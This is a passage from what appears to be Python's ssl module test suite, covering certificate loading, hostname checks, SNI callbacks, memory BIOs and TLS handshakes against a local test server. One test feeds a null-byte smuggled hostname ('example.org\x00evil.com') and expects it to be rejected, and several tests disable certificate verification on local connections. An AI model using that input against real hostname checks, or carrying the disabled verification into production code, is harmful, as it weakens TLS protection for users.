ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(
ssl.SSLError,
"no start line: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(
ssl.SSLError,
"not enough data: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', '[email protected]'),)),
'notAfter': 'Mar 29 12:29:49 2033 GMT',
'notBefore': 'Mar 30 12:29:49 2003 GMT',
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', '[email protected]'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(
ssl.PROTOCOL_TLSv1_2,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True
)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1_2)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(), server_side=True)
self.assertIsInstance(obj, MySSLObject)
def test_num_tickest(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.num_tickets, 2)
ctx.num_tickets = 1
self.assertEqual(ctx.num_tickets, 1)
ctx.num_tickets = 0
self.assertEqual(ctx.num_tickets, 0)
with self.assertRaises(ValueError):
ctx.num_tickets = -1
with self.assertRaises(TypeError):
ctx.num_tickets = None
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.num_tickets, 2)
with self.assertRaises(ValueError):
ctx.num_tickets = 1
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_server(("127.0.0.1", 0)) as s:
c = socket.create_connection(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
self.server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.server_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=self.server_context)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
s = ctx.wrap_socket(
socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME
)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_sni(self):
host, port = self.server_addr
server_names = []
# We store servername_cb arguments to make sure they match the host
def servername_cb(ssl_sock, server_name, initial_context):
server_names.append(server_name)
self.server_context.set_servername_callback(servername_cb)
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=SIGNING_CA)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port, pem))
self.assertEqual(server_names, [host, host])
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_get_server_certificate_timeout(self):
def servername_cb(ssl_sock, server_name, initial_context):
time.sleep(0.2)
self.server_context.set_servername_callback(servername_cb)
with self.assertRaises(socket.timeout):
ssl.get_server_certificate(self.server_addr, ca_certs=SIGNING_CA,
timeout=0.1)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', support.SHORT_TIMEOUT)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with socket_helper.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
elif rc == errno.ENETUNREACH:
